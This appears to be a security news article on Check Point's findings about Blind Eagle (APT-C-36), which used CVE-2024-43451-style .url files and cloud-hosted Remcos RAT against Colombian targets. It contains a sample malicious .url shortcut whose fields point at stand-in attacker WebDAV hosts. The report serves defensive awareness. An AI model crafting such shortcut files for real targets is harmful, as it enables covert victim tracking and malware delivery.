A series of ongoing, targeted cyber campaigns by Blind Eagle (APT-C-36), one of Latin America’s most dangerous threat actors primarily targeting Colombia’s justice system, government institutions, and private organizations were recently unveiled by Check Point Research (CPR).
The group has demonstrated remarkable adaptability, incorporating new attack techniques just six days after Microsoft patched CVE-2024-43451, showing how attackers can turn security updates into weapons against their targets.
This rapid adaptation highlights the growing sophistication of cyber threats and the need for proactive defenses to counter them.
CPR’s investigation uncovered more than 9,000 infections in just one week, a staggering number that underscores the efficacy of Blind Eagle’s tactics.
What makes these attacks particularly concerning is Blind Eagle’s strategic use of legitimate cloud-based services to bypass traditional security measures.
By leveraging trusted platforms like Google Drive, Dropbox, GitHub, and Bitbucket to host and distribute malware, the group makes it significantly more difficult for security tools to detect and flag their malicious activity.
These platforms are typically considered safe by security systems, creating a perfect cover for malicious operations.
This method also enables the group to quickly update their malware payloads without reconfiguring their attack infrastructure, providing operational flexibility that enhances their effectiveness.
The attack methodology employed by Blind Eagle demonstrates sophisticated understanding of both technical vulnerabilities and human behavior.
Their approach requires minimal user interaction to trigger malware execution, making traditional security awareness less effective as a defensive measure.
Simply right-clicking, deleting, or dragging a malicious file can trigger a WebDAV request, which notifies the attackers that the file has been accessed.
If the victim then clicks on the file, the next-stage payload is downloaded and executed, leading to a full-blown compromise of the system.
Weaponizing .URL Files for Stealthy Attacks
The most innovative aspect of Blind Eagle’s current campaign is their weaponization of .url files as a tracking and delivery mechanism.
These specially crafted shortcut files contain references to attacker-controlled WebDAV servers, enabling both passive victim tracking and active malware delivery.
The technical implementation resembles the following structure:-
[InternetShortcut]
URL=file://attacker-server/document
IconFile=\\attacker-webdav\share\icon.ico
IconIndex=0
.webp)
The stealth of this method makes detection particularly challenging. Unlike traditional malware that requires a user to open an attachment or enable macros, these .url files act passively, reporting back to attackers even before they are explicitly executed.
This allows Blind Eagle to identify and prioritize potential victims before deploying the full malware payload.
Once executed, the final payload deployed is Remcos RAT (Remote Access Trojan), a sophisticated malware that grants attackers complete control over an infected machine.
After infection, Remcos can capture user credentials by logging keystrokes and stealing stored passwords, modify and delete files to sabotage systems or encrypt data for ransom, establish persistence through scheduled tasks and registry modifications to survive reboots, and exfiltrate sensitive information to command-and-control servers operated by Blind Eagle.
The speed at which Blind Eagle weaponized a newly patched vulnerability raises important questions about the evolving threat landscape.
Rather than waiting for zero-day vulnerabilities, threat actors are now closely monitoring security patches, analyzing them, and developing similar techniques that can bypass newly implemented defenses.
This demonstrates how cyber criminals are becoming more agile, innovative, and prepared, requiring security teams to accelerate their patch management strategies and implement AI-driven threat prevention solutions to detect emerging threats before they can take hold.
The sophisticated tactics employed by Blind Eagle represent a significant evolution in cyber threat methodologies.
By leveraging trusted platforms and minimizing required user interaction, these attacks bypass traditional security measures with alarming efficiency.
Organizations must respond by implementing comprehensive security strategies that include real-time endpoint protection, enhanced email security, and continuous monitoring of network traffic, particularly connections to legitimate cloud services that could be exploited as malware delivery channels.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
